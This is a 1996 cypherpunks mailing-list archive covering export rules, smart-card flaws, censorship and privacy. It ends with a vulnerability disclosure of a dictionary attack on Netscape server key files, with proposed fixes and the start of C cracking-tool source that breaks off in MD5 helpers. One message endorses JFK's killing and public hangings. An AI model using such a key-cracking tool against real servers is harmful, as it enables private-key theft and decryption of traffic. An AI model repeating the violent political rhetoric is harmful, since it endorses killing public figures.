> > your test subjects; to a _very_ large degree, intelligence isn't 
> > genetic. Or

> That's the political correct thing to say, but do you have any
> scientific evidence to support this claim?

People have argued for genetic disposition to certain things, and I 
think they are sometimes (most times?) confused between genetics per se 
(genes et al) and the way environment creates much of the being 
indirectly.  For example, you are born with a chemical factory inside of 
you.  The amount and timing of hormonal secretions from myriad sources 
inside the body has a dramatic effect on the development of the being, 
and environment has a dramatic effect on the amount and timing of said 
hormonal secretions.  You can bias the formula all you want, but it can 
go in unpredictable directions, due to the great variety of influences.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Thu, 26 Sep 1996 16:37:15 +0800
To: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Uses of Computational Chaos
Message-ID: <19960926062611125.AAA204@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 25 Sep 1996 13:46 EDT, E. Allen Smith wrote:

>>Supposing, too, that you know these weaknesses, would using separate algorithms
>>for different portions of the number work well?

>	That would seem to be a possibility; admittedly, the local copy of
>AC has been checked out for the past year, so I haven't been able to take a
>look at it. I'd tend to think that if you _know_ the flaw, one could come up
>with a better way to deal with it than the generalized method I discussed.
>For instance, if the MSB of bytes coming out of a scribble window is too low
>in entropy, only use it XORed or whatever with a more-random bit.


That's what I was thinking.   Or possibly even replace the MSB with the MSB
from another algorithm with other characteristics.   Genetic programing would
also be interesting here if you could write a program that would mix-n-match
algorithms/seeds and gradually choose one that produces very high entropy!

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 26 Sep 1996 16:53:28 +0800
To: Phil Fraering <pgf@acadian.net>
Subject: Re: Hallam-Baker demands more repudiations or he'll write!
In-Reply-To: <Pine.SOL.3.93.960925094517.13583F-100000@stiletto.acadian.net>
Message-ID: <324A22AC.4A96@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Phil Fraering wrote:
> I guess the final word on assasination politics would be obvious:
> It's widely believed that the New Orleans Mafia (the source of my
> recent statement about body decomposition in Louisiana swamps) was a
> prime driver in the assasination of the late President John F. 
> Kennedy.
> I think it's fairly safe to say that having done this didn't do them a
> damn bit of good. It didn't do anyone else a damn bit of good.
> The world remained just as corrupt as it always was.

Sometimes a person just gets mad, and what can you do?

Anyway, a long time ago, someone inscribed a small stone or tablet with 
fragments of several obscure written languages, later to be called the 
Rosetta Stone. The JFK assassination is a Rosetta Stone too.  Dig in!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 26 Sep 1996 15:13:20 +0800
To: cypherpunks@toad.com
Subject: Re: Taking crypto out of the U.S.
In-Reply-To: <Pine.SUN.3.94.960925220250.2802J-100000@polaris>
Message-ID: <TkFuuD31w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn <unicorn@schloss.li> writes:

> On Wed, 25 Sep 1996, Igor Chudov @ home wrote:
>
> > > >> Soon I am going to be going overseas to Japan, and I want to take
> > > >> my notebook with me so I can keep up with everything, however, I have
> > > >> encrypted my hard drive and usually encrypt my mail.  Is this in
> > > >> violation of the ITAR to keep everything the same when I go over?
> >
> > Gentlemen, us customs does not give shit about what you take out
> > on your diskettes.
> >
> > When I went to Russia recenty, I took PGP for DOS, and no one gave
> > me any problem.
> >
> > IANAL
>
> Obviously not, you've just confessed to a felony.

And I've just forwarded Igor's confession to the Right Reverend
Colin James III.

Looks like we've got our ITAR test case. :-)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering <pgf@acadian.net>
Date: Thu, 26 Sep 1996 15:02:17 +0800
To: cypherpunks@toad.com
Subject: Re: ISPs' information on users
In-Reply-To: <ae6eb64e04021004ee53@[207.167.93.63]>
Message-ID: <Pine.SOL.3.93.960925232412.22278C-100000@stiletto.acadian.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 25 Sep 1996, Timothy C. May wrote:

> Just why do you think I was elliptical in my comments? To type three lines
> instead of just typing the name? Think about it.

Oh. That organization. I thought it was simply because the topic had been
done to death.

Speaking of topics being done to death, I'm probably going to cease my
subscription to cypherpunks as soon as my subscription to the filtered
list is confirmed. (Which is why I'm not following up to Vulis' messages
any more... the conversation would probably stop anyway when I stopped
seeing his half of the messages, and I probably wouldn't see mine on
the filtered list anyway...)

> With Webcrawlers looking for names of organizations--and the Cypherpunks
> archives show up on such searches--and with some organizations being very
> quick to sue for perceived defamation....

This brings up something else: the last time I tried to find the
cypherpunks archives on a web search they didn't show up.

The last time I accessed them was in March, and they were kind-of sick
then... I guess things just got too bad for the archival scheme to handle?

Phil Fraering          The above is the opinion of neither my internet
pgf@acadian.net        service provider nor my employer.
318/261-9649               





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 26 Sep 1996 15:21:30 +0800
To: cypherpunks@toad.com
Subject: Re: Hallam-Baker demands more repudiations or he'll write!
In-Reply-To: <Pine.LNX.3.94.960925203856.1084A-100000@anx0918.slip.appstate.edu>
Message-ID: <yPFuuD33w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


The Deviant <deviant@pooh-corner.com> writes:
> > > It's widely believed that the New Orleans Mafia (the source of my recent
> > > statement about body decomposition in Louisiana swamps) was a prime drive
> > > in the assasination of the late President John F. Kennedy.
> > >
> > > I think it's fairly safe to say that having done this didn't do them a
> > > damn bit of good. It didn't do anyone else a damn bit of good.
> >
> > JFK deserved to die.
>
> Wile i neither agree nor disagree with your point, it does seem a bit
> irrelavant, but thats just MHO.

Well - this thread has very little crypto-relevance (AP itself has
questionable crypto-relevance, IMO, and should be discussed in
talk.politics.assassination, carried by every honorable Usenet site).
But as far as AP is concerned, clearly JFK's death (quite deserved)
did not deter other scum like him from seeking political office.
Now, if he had been tried (for treason, murder, etc) and died like
a criminal, not like a hero, on national TV, that would have done
a lot more damage to the image of the office of the president of
the united states. Just look back at what Nixon's resignation did.
I believe in public hangings after a fair trial.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering <pgf@acadian.net>
Date: Thu, 26 Sep 1996 17:22:06 +0800
To: cypherpunks@toad.com
Subject: Re: Medical Data
In-Reply-To: <ae6eb49d0302100488aa@[207.167.93.63]>
Message-ID: <Pine.SOL.3.93.960925234137.22278E-100000@stiletto.acadian.net>
MIME-Version: 1.0
Content-Type: text/plain


You're absolutely correct about the informed patient bit;  I have
developed the policy of checking the PDR entry for any medication I take. 
And found out about some interactions my doctor didn't tell me about.

There's a paradox about Andy Grove's situation: if he starts browsing
medical databases and someone can analyze his traffic, or scans his
traffic on a closed but not encrypted private email support group, they
can deduce much about his condition. Now since everyone else knows about
Grove's situation anyway (I suppose he talked about it) and it was brought
up regarding my comments about pharmaceutical interactions (and in those
comments I was acting reflexively towards a phobia about medical
interactions) it's a moot point concerning the medical side and his
privacy information; but the privacy angle still needs to be considered in
the general case:

In order for someone to do this in complete privacy, encryption would have
to be ubiquitous; the norm, rather than the exception it is now.

There aren't records of who looks up something in the PDR at your local
library, but an ISP could gather much info about its users from what sites
they frequent...

Phil Fraering          The above is the opinion of neither my internet
pgf@acadian.net        service provider nor my employer.
318/261-9649               





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <vipul@pobox.com>
Date: Thu, 26 Sep 1996 05:38:40 +0800
To: cypherpunks@toad.com
Subject: Euro-Commission to tackle porn on Internet
Message-ID: <199609260004.AAA00668@fountainhead.net>
MIME-Version: 1.0
Content-Type: text


*** Euro-Commission to tackle porn on Internet

The European Commission, faced with calls to clamp down on Internet
pornography following a Belgian pedophilia scandal, will take a first
step in October toward seeing how it can be done. On Oct. 9, Culture
Commissioner Marcelino Oreja plans to unveil a paper outlining how to
identify authors of Internet pornography and how to interrupt that
pornography. Oreja said options raised in the paper include encrypting
access so that only those who pay could see the material or including
a V-chip to screen against pornographic content. For the full text
story, see http://www.merc.com/stories/cgi/story.cgi?id=178562-80c

- Vipul

-- 

Vipul Ved Prakash                 | - Electronic Security & Crypto 
vipul@pobox.com 	          | - Internet & Intranets 
91 11 2247802                     | - Web Development & PERL 
198 Madhuban IP Extension         | - Linux & Open Systems 
Delhi, INDIA 110 092              | - (Networked) Multimedia





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 26 Sep 1996 17:27:02 +0800
To: cypherpunks@toad.com
Subject: Re: Newsgroup proposal: misc.anonymous
In-Reply-To: <Pine.LNX.3.95.960925223111.314A-100000@gak>
Message-ID: <0HJuuD36w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Mark M." <markm@voicenet.com> writes:
> In an effort to get anonymity and message pools more widespread, I think it
> would be a good idea to establish a newsgroup for anonymous message pools tha
> would get the same distribution as any other newsgroup in the "big 8".  The
> "misc" hierarchy is probably the best place for such a newsgroup since it
> already carries groups like "misc.misc" and "misc.test".  Does anyone have an
> suggestions or objections?

It should be under misc.activism: misc.activism.anonymity or even m.a.privacy.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alexander 'Sasha' Chislenko" <sasha1@netcom.com>
Date: Thu, 26 Sep 1996 18:30:14 +0800
To: cypherpunks@toad.com
Subject: CONF/ORG: EXTRO-3 date
Message-ID: <3.0b26.32.19960926012027.00693d04@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


We are trying to plan the time for the EXTRO-3 - the Third in the
infinite series of Extropian conferences.
The tentative dates for EXTRO-3 are now weekends of August 2-3
and August 9-10 of 1997, with a backup plan of July 26-27 weekend.
We would like to select the date so that it would not interfere
with other conferences, and be convenient for everybody.
If you know of any other events of extropian/transhumanist/libertarian/
life-extension/cypherpunk interest planned for one of those weekends,
or if you would like to attend and have have personal preferences for
one of these days, please send me _private_ mail at sasha1@netcom.com

(You can find general info on Extropianism at
 http://www.primenet.com/~maxmore/extropy.htm )


On behalf of the of Extropian Action Team,

-------------------------------------------------------------------------
Alexander Chislenko <sasha1@netcom.com>  www.lucifer.com/~sasha/home.html
Firefly Network, Inc.: <alexc@firefly.net>  www.ffly.com
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 27 Sep 1996 03:59:08 +0800
To: cypherpunks@toad.com
Subject: Re: Taking crypto out of the U.S.
Message-ID: <ae6ff5f309021004085d@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:55 AM 9/26/96, Adamsc wrote:
>On Wed, 25 Sep 1996 06:26:31 -0500 (EST), Adam Shostack wrote:
>
>>| >Theres a personal use exemption.  Michael Froomkin's web page has a
>>| >pointer to it.
>
>>| What if your laptop gets "stolen"?  Or you sell it for a plane ticket home
>>| after your wallet gets pinched?
>
>>You're required to report it to the Feds.  RTFU.
>
>Yeah, but you can't be persecuted.    So what happens if Joe-Cryptographer
>writes a *great* NSA-stumping crypto program - not for export - and it just
>happens to get pinched (The police might even recover it!)?  Outside
>distribution w/o penalties...

This is what judges and juries are for. Interpreting the "spirit of the law."

(I feel strange defending the legal system, but in plain English: it ain't
this stupid. A defense of "I didn't give secrets to the Koreans, I was just
reading these documents outside their embassy, and they blew off the bench
and onto their property." won't cut it. Or, at least, I think there's a
fair chance a jury would find one guilty of espionage, treason, whatever.)

Now I don't think there's any real chance of being prosecuted for having a
laptop lost or stolen, regardless of what it contains (unless it was true
DOD secret stuff, and then the discipline would be handled internally to
one's agency), but don't think for a second that this is a new "loophole"
in the export laws!

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 27 Sep 1996 04:19:07 +0800
To: cypherpunks@toad.com
Subject: Weaknesses in Smart Cards? (Re: FLA_wed)
Message-ID: <ae6ffc4f0b02100486bd@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



Thanks, John. I read the full article. I'm skeptical.

At 12:08 PM 9/26/96, John Young wrote:
>   9-26-96. NYP:
>
>   "Potential Flaw In Cash Card Security Seen. Counterfeiting
>   a Risk, Say Bellcore Scientists." Markoff.

>      The Bellcore researchers said that a smart card's
>      security could be breached by forcing the microchip in
>      the card to make a calculation error, whether through
>      sophisticated means like bombarding the card with
>      radiation or perhaps cruder methods like placing it in
>      a microwave oven. A mathematical formula they derived
>      could use this error to extrapolate the secret data that
>      authenticates the card when it is used.

As the researchers note, they haven't actually done this.

Having worked on radiation effects on chips, I'm skeptical that this can be
done economically. Simple radiation sources won't be penetrating enough
(for the high "linear energy transer" (LET) particles needed to deposit
enough energy to flip a logic state) and the penetrating stuff (betas and
gammas) are low-LET and will only disrupt logic states in very high overall
exposures (kilorads).

A cyclotron, for example, could get some high-LET particles through the
packaging to the chips.

Strip-back of the outer packaging is possible, of course. I'd need to know
a lot more about the packaging used by VISA and other smartcard makers to
know how economical this would be. (Breaking any single card is not
necessarily a financial windfall, if the card has a limit, for example.
This puts a limit on how much $$$ can be spent on cracking a chip.)

Also, there are electrically-erasable PROM (EEPROM) chips which are very
difficult to clone, and which would have response properties to radiation
which are much different from static RAMs and microprocessors.

The "microwave oven" point I won't comment on.

Their work on what might be called a kind of "avalanche" algorithm, where a
few flaws in operation yield secrets at the output, seems interesting.

However, one thing that disturbs me (and their work is not the only
example) is the "press release" nature. Especially for _theoretical_ work,
rather than actual demonstration!

When the cracking of a 40-bit key was done about a year ago (by a couple of
Cypherpunks, including the French student), it was a *real* crack, not a
press release about a _possible_ attack. Likewise, the Netscape crack by
Wagner and Goldberg was a *real* attack.

But as the "arms race" for press releases about potential security flaws
escalates, it appears people are pre-announcing results, or gussying-up
potential flaws in the language of scary press releases.

Not a good journalistic trend, in my opinion.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aaron@burn.ucsd.edu (Aaron)
Date: Thu, 26 Sep 1996 21:51:57 +0800
To: aaron@burn.ucsd.edu
Subject: Re: Global Alert: GERMAN GOVERNMENT PUSHES BLOCKAGE OF NETHERLANDS WEB SITES
Message-ID: <v02130503ae6fea85d453@[128.48.140.39]>
MIME-Version: 1.0
Content-Type: text/plain


I am writing in reference to the document, Global Alert: GERMAN GOVERNMENT
PUSHES BLOCKAGE OF NETHERLANDS WEB SITES, which is available on the web as
<http://www.xs4all.nl/~felipe/press/global-alert.txt>, with links to
related documents and information at
<http://www.xs4all.nl/~felipe/germany.html>.

I think that information about the German government's attacks on the web,
and on revolutionary publications, should be propogated as widely as
possible, and I encourage those who have not seen the 'Global Alert' and
related documents to download and read them.  I am very disturbed, however,
by some of the formulations in the 'Alert', and I want to make my
criticisms widely known as well, since I believe that the issues I raise
are very important for defenders of free communication.  I understand that
others may disagree about both the correctness and importance of my
criticisms. So be it.

Here are the offending passages and my criticisms:

>The proper response to offensive expression is more and better
>expression, and prosecution of offending criminals, not censorship.

This reference to 'offending criminals' seems to imply that those who
create 'offensive expression' may properly be regarded as 'criminals' and
prosecuted on account of that expression, in case some government has
decided to criminalize such expression.

>As a result of the overly broad censorship measure which targets
>an entire Internet access provider instead of a specific user

This implies that censorship which targets a specific user might be alright!

>Access for All, though it has expressed willingness to assist the Dutch
>police in identifying online criminals abusing the xs4all system ...

This is the most disturbing statement in the document. It apparently
threatens to turn over users of the system to the police if they are (by
whose definition?) 'online criminals abusing the xs4all system'.

>Instead of the futile act of censorship ... the German government
>should have acted through legal channels and asked the authorities in
>the Netherlands to cooperate in determining what legal action, if any,
>was appropriate.

Is it appropriate to advise the German government how to carry out its
attacks on left media in a less 'futile' manner? Do you want to say that
the German government has a right to ask for assistance from the Dutch
government in carrying out these attacks? Are you sure that the Dutch
government will not, in the not-so-distant future, be willing to help them?

--Aaron

P.S. I am a news broadcaster and commentator with Free Radio Berkeley, a
well-known unlicensed radio station. I will continue to report on this
story until the German government gives up its attempts to suppress Radikal
and other revolutionary publications.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Thu, 26 Sep 1996 05:42:23 +0800
To: cypherpunks@toad.com
Subject: [Long] How to break Netscape's server key encryption
Message-ID: <84366802803808@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


The Netscape server key format is very susceptible to both a dictionary attack
and to keystream recovery.  It uses the PKCS #8 format for private keys, which
provides a large amount of known plaintext at the start of the data, in
combination with RC4 without any form of IV or other preprocessing (even though
PKCS #8 recommends that PKCS #5 password-based encryption be used), which means
you can recover the first 100-odd bytes of key stream with a simple XOR (the
same stupid mistake Microsoft made with their .PWL files).  This means two
things:

1. It's very simple to write a program to perform a dictionary attack on the
   server key (it took me about half an hour using cryptlib, and another half
   hour to rip the appropriate code out of cryptlib to create a standalone
   program).

2. The recovered key stream from the encrypted server key can be used to
   decrypt any other resource encrypted with the server password, *without
   knowing the password*.  This is because there's enough known plaintext
   (ASN.1 objects, object identifiers, and public key components) at the start
   of the encrypted data to recover large quantities of key stream.

To demonstrate the problem, I have written a program which performs a
dictionary attack on the server key, and if successful prints the password used
to encrypt it and the server's RSA private key.  Originally I used my
encryption library (http://www.cs.auckland.ac.nz/~pgut001/cryptlib.html) to do
the encryption, to turn it into a standalone program I ripped the necessary
parts out of the library, which means it's a bit messy and not as portable as
the original was.  The code could probably be made to run about twice as fast
if it's properly optimised, but I don't know if it's worth the bother and
besides, it's just gone 4am I could use some sleep.

To run it, use:

  breaksk <Netscape server key file> <word list file>

Here's the output from a server key someone sent me, tested against my 100MB+
word list collection (some people collect stamps, I collect word lists :-):

  The password used to encrypt this Netscape server key is 'unguessable'.

  Modulus = 00D50626580C2543378FD249994A543FBF5FF1333E70684E942EC7034E5FA [...]
  Public exponent = 03
  Private exponent = 008E0419900818D77A5FE18666318D7FD4EAA0CCD44AF03462C9 [...]
  Prime 1 = 00FBD3FC2CE1F50B31323F2D3FA27F6708D4373CC0487DB7199A712124380 [...]
  Prime 2 = 00D88D984BA6A7CD07F6608D95D3AC2682769DA904D061E593CF86A21B4A9 [...]
  Exponent 1 = 00A7E2A81DEBF8B220CC2A1E2A6C54EF5B3824D32ADAFE7A1111A0C0C2 [...]
  Exponent 2 = 00905E6587C46FDE054EEB090E8D1D6F01A4691B588AEBEE628A59C167 [...]
  Coefficient = 2DEBC012356B96D2206346141371D999288F55DD07AEF6D1972383E97 [...]

(I've trimmed some of the lines a bit).

The problem here is caused by a combination of the PKCS #8 format (which is
rather nonoptimal for protecting private keys) and the use of RC4 to encryt
fixed, known plaintext.  Since everything is constant, you don't even need to
run the password-transformation process more than once - just store a
dictionary of the resulting key stream for each password in a database, and you
can break the encryption with a single lookup (this would be avoided by the use
of PKCS #5 password-based encryption, which iterates the key setup and uses a
salt to make a precomputed dictionary attack impossible.  PKCS #5 states that
its primary intended application is for protecting private keys, but Netscape
chose not to use this and went with straight RC4 instead).

A quick (but not necessarily optimal) solution to the problem involves two
changes:

1. Only encrypt the unknown, private fields in the key (which is what PGP
   does).  Instead of wrapping everything up in several layers of encapsulation
   with object identifiers and public-key components, change the portion which
   is encrypted to:

      EncryptedRSAPrivateKey ::= SEQUENCE {
        privateExponent INTEGER,
        prime1          INTEGER,
        prime2          INTEGER,
        exponent1       INTEGER,
        exponent2       INTEGER,
        coefficient     INTEGER
        }

   with everything else outside this object.

2. Don't use a simple stream cipher to encrypt fixed data like this.  Use an IV
   on the encrypted data.  Iterate the password setup to slow down a dictionary
   attack (I posted a scheme for transforming variable to fixed-length keys to
   the cypherpunks list a few days ago which provides the necessary
   functionality).

The consequences of this attack are pretty scary.  It involves vastly less
effort than breaking a 40-bit session key or factoring a 512-bit public key,
yet once you've recovered the private key you can also recover every session
key it's ever protected in the past and will ever protect in the future (which
is why I'm a fan of signed DH for session key exchange).  The ease with which a
dictionary attack can be carried out represents a critical weakness which
compromises all other encryption components on the server - spending a few days
with a Markov-model based phrase generator on a PC is still a lot easier than
spending a few months with GNFS and a workstation farm.

It seems strange that there are no real standards defined for secure storage of
such a critical component as a private key.  Although a lot of work has gone
into X.509 and the multitude of related public-key certificate standards, the
only generally-used private-key formats are PKCS #8 (which has problems, as
demonstrated above), and Microsofts recently-proposed PFX (Personal Information
Exchange) data format and protocol (PFX is designed to allow users to move
their keys, certificates and other personal information securely from one
platform to another, you can get more info on it from
http://www.microsoft.com/intdev/security/misf11_7.htm), which is too new to
comment on.  It would be useful if a portable, secure private-key format at the
same level as the X.509 effort were developed to solve this problem.

For the curious (and ASN.1-aware), here's what the data formats look like.
First there's the outer encapsulation which Netscape use to wrap up the
encrypted key:

  NetscapeServerKey ::= SEQUENCE {
    identifier          OCTET STRING ('private-key'),
    encryptedPrivateKeyInfo
                        EncryptedPrivateKeyInfo
    }

Inside this is a PKCS #8 private key:

  EncryptedPrivateKeyInfo ::= SEQUENCE {
    encryptionAlgorithm EncryptionAlgorithmIdentifier,
    encryptedData       EncryptedData
    }

  EncryptionAlgorithmIdentifier ::= AlgorithmIdentifier

  EncryptedData = OCTET STRING

Now the EncryptionAlgorithmIdentifier is supposed to be something like
pbeWithMD5AndDES, with an associated 64-bit salt and iteration count, but
Netscape ignored this and used straight rc4 with no salt or iteration count.
The EncryptedData decrypts to:

  PrivateKeyInfo ::= SEQUENCE {
    version             Version
    privateKeyAlgorithm PrivateKeyAlgorithmIdentifier
    privateKey          PrivateKey
    attributes    [ 0 ] IMPLICIT Attributes OPTIONAL
    }

  Version ::= INTEGER

  PrivateKeyAlgorithmIdentifier ::= AlgorithmIdentifier

  PrivateKey ::= OCTET STRING

  Attributes ::= SET OF Attribute

The algorithm information is encoded as:

  AlgorithmIdentifier ::= SEQUENCE {
    algorithm           ALGORITHM.&id( { SupportedAlgorithms } ),
    parameters          ALGORITHM.&Type( { SupportedAlgorithms }{ @algorithm } )
                            OPTIONAL
    }

  SupportedAlgorithms ALGORITHM ::= { ... }

  ALGORITHM ::= TYPE-IDENTIFIER

(and so on and so on, I haven't bothered going down any further).  The
EncryptionAlgorithmIdentifier is '1 2 840 113549 3 4' or { iso(1)
member-body(2) US(840) rsadsi(113549) algorithm(3) rc4(4) }.  The
PrivateKeyAlgorithmIdentifier is '1 2 840 113549 1 1 1' or { iso(1)
member-body(2) US(840) rsadsi(113549) pkcs(1) pkcs1-1(1) rsaEncryption(1) }.

Included below is the code to perform the attack (set tabs to 4, phasers to
stun).

Do I get a t-shirt for this? :-)

Peter.

-- Snip --

/* BreakSK - Break Netscape server key file encryption via dictionary attack.
   Written by Peter Gutmann <pgut001@cs.auckland.ac.nz> 26 September 1996 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Most of the code here was ripped out of cryptlib and is somewhat messy as
   a consquence.  cryptlib has fairly extensive self-configuration and an
   internal API which hides machine-specific details, this program doesn't
   (the code here really wasn't meant for standalone use).  As a result you
   need to manually define LITTLE_ENDIAN or BIG_ENDIAN, and it won't work at
   all on 64-bit systems.  If you want the portability, use cryptlib instead */

#define LITTLE_ENDIAN
/* #define BIG_ENDIAN */

/* Workarounds for cryptlib defines, constants, and macros */

#define MASK32(x)	x

#define FALSE	0
#define TRUE	!FALSE

typedef unsigned char BYTE;
typedef unsigned long LONG;
typedef int BOOLEAN;

/* Functions to convert the endianness from the canonical form to the
   internal form.  bigToLittle() convert from big-endian in-memory to
   little-endian in-CPU, littleToBig() convert from little-endian in-memory
   to big-endian in-CPU */

void longReverse( LONG *buffer, int count );

#ifdef LITTLE_ENDIAN
  #define bigToLittleLong( x, y )	longReverse(x,y)
  #define littleToBigLong( x, y )
#else
  #define bigToLittleLong( x, y )
  #define littleToBigLong( x, y )	longReverse(x,y)
#endif /* LITTLE_ENDIAN */

/* Byte-reverse an array of 16- and 32-bit words to/from network byte order
   to account for processor endianness.  These routines assume the given
   count is a multiple of 16 or 32 bits.  They are safe even for CPU's with
   a word size > 32 bits since on a little-endian CPU the important 32 bits
   are stored first, so that by zeroizing the first 32 bits and oring the
   reversed value back in we don't need to rely on the processor only writing
   32 bits into memory */

void longReverse( LONG *buffer, int count )
	{
#if defined( _BIG_WORDS )
	BYTE *bufPtr = ( BYTE * ) buffer, temp;

	count /= 4;		/* sizeof( LONG ) != 4 */
	while( count-- )
		{
		/* There's really no nice way to do this - the above code generates
		   misaligned accesses on processors with a word size > 32 bits, so
		   we have to work at the byte level (either that or turn misaligned
		   access warnings off by trapping the signal the access corresponds
		   to.  However a context switch per memory access is probably
		   somewhat slower than the current byte-twiddling mess) */
		temp = bufPtr[ 3 ];
		bufPtr[ 3 ] = bufPtr[ 0 ];
		bufPtr[ 0 ] = temp;
		temp = bufPtr[ 2 ];
		bufPtr[ 2 ] = bufPtr[ 1 ];
		bufPtr[ 1 ] = temp;
		bufPtr += 4;
		}
#else
	LONG value;

	count /= sizeof( LONG );
	while( count-- )
		{
		value = *buffer;
		value = ( ( value & 0xFF00FF00UL ) >> 8  ) | \
				( ( value & 0x00FF00FFUL ) << 8 );
		*buffer++ = ( value << 16 ) | ( value >> 16 );
		}
#endif /* _BIG_WORDS */
	}

#define mputLLong(memPtr,data)	\
		memPtr[ 0 ] = ( BYTE ) ( ( data ) & 0xFF ); \
		memPtr[ 1 ] = ( BYTE ) ( ( ( data ) >> 8 ) & 0xFF ); \
		memPtr[ 2 ] = ( BYTE ) ( ( ( data ) >> 16 ) & 0xFF ); \
		memPtr[ 3 ] = ( BYTE ) ( ( ( data ) >> 24 ) & 0xFF ); \
		memPtr += 4

/****************************************************************************
*																			*
*										MD5 								*
*																			*
****************************************************************************/

/* The MD5 block size and message digest sizes, in bytes */

#define MD5_DATASIZE	64
#define MD5_DIGESTSIZE	16

/* The structure for storing MD5 info */

typedef struct {
			   LONG digest[ 4 ];			/* Message digest */
			   LONG countLo, countHi;		/* 64-bit bit count */
			   LONG data[ 16 ];				/* MD5 data buffer */
#ifdef _BIG_WORDS
			   BYTE dataBuffer[ MD5_DATASIZE ];	/* Byte buffer for data */
#endif /* _BIG_WORDS */
			   BOOLEAN done;				/* Whether final digest present */
			   } MD5_INFO;

/* Round 1 shift amounts */

#define S11	7
#define S12	12
#define S13	17
#define S14	22

/* Round 2 shift amounts */

#define S21 5
#define S22 9
#define S23 14
#define S24 20

/* Round 3 shift amounts */

#define S31 4
#define S32 11
#define S33 16
#define S34 23

/* Round 4 shift amounts */

#define S41 6
#define S42 10
#define S43 15
#define S44 21

/* F, G, H and I are basic MD5 functions */

#define F(X,Y,Z)	( ( X & Y ) | ( ~X & Z ) )
#define G(X,Y,Z)	( ( X & Z ) | ( Y & ~Z ) )
#define H(X,Y,Z)	( X ^ Y ^ Z )
#define I(X,Y,Z)	( Y ^ ( X | ~Z ) )

/* ROTATE_LEFT rotates x left n bits */

#define ROTATE_LEFT(x,n)	( ( x << n ) | ( x >> ( 32 - n ) ) )

/* FF, GG, HH, and II transformations for rounds 1, 2, 3, and 4 */

#define FF(A,B,C,D,X,shiftAmt,magicConst) \
	A += F( B, C, D ) + X + magicConst; \
	A = MASK32( ROTATE_LEFT( MASK32( A ), shiftAmt ) + B )

#define GG(A,B,C,D,X,shiftAmt,magicConst) \
	A += G( B, C, D ) + X + magicConst; \
	A = MASK32( ROTATE_LEFT( MASK32( A ), shiftAmt ) + B )

#define HH(A,B,C,D,X,shiftAmt,magicConst) \
	A += H( B, C, D ) + X + magicConst; \
	A = MASK32( ROTATE_LEFT( MASK32( A ), shiftAmt ) + B )

#define II(A,B,C,D,X,shiftAmt,magicConst) \
	A += I( B, C, D ) + X + magicConst; \
	A = MASK32( ROTATE_LEFT( MASK32( A ), shiftAmt ) + B )

/* Basic MD5 step. Transforms digest based on data.  Note that if the
   Mysterious Constants are arranged backwards in little-endian order and
   decrypted with DES they produce OCCULT MESSAGES! */

void MD5Transform( LONG *digest, LONG *data )
	{
	LONG A, B, C, D;

	/* Set up local data */
	A = digest[ 0 ];
	B = digest[ 1 ];
	C = digest[ 2 ];
	D = digest[ 3 ];

	/* Round 1 */
	FF( A, B, C, D, data[  0 ], S11, 3614090360UL );	/*  1 */
	FF( D, A, B, C, data[  1 ], S12, 3905402710UL );	/*  2 */
